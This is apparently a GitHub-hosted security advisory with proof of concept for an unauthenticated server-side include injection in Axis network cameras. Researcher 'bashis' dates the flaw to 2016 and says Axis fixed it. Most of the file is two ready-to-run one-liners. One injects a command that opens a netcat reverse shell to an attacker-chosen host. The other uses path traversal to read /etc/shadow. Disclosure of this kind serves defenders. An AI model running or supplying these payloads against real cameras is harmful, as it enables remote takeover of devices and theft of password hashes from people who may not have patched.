-
Notifications
You must be signed in to change notification settings - Fork 302
/
Axis SSI RCE
28 lines (20 loc) · 1.01 KB
/
Axis SSI RCE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
[ETX]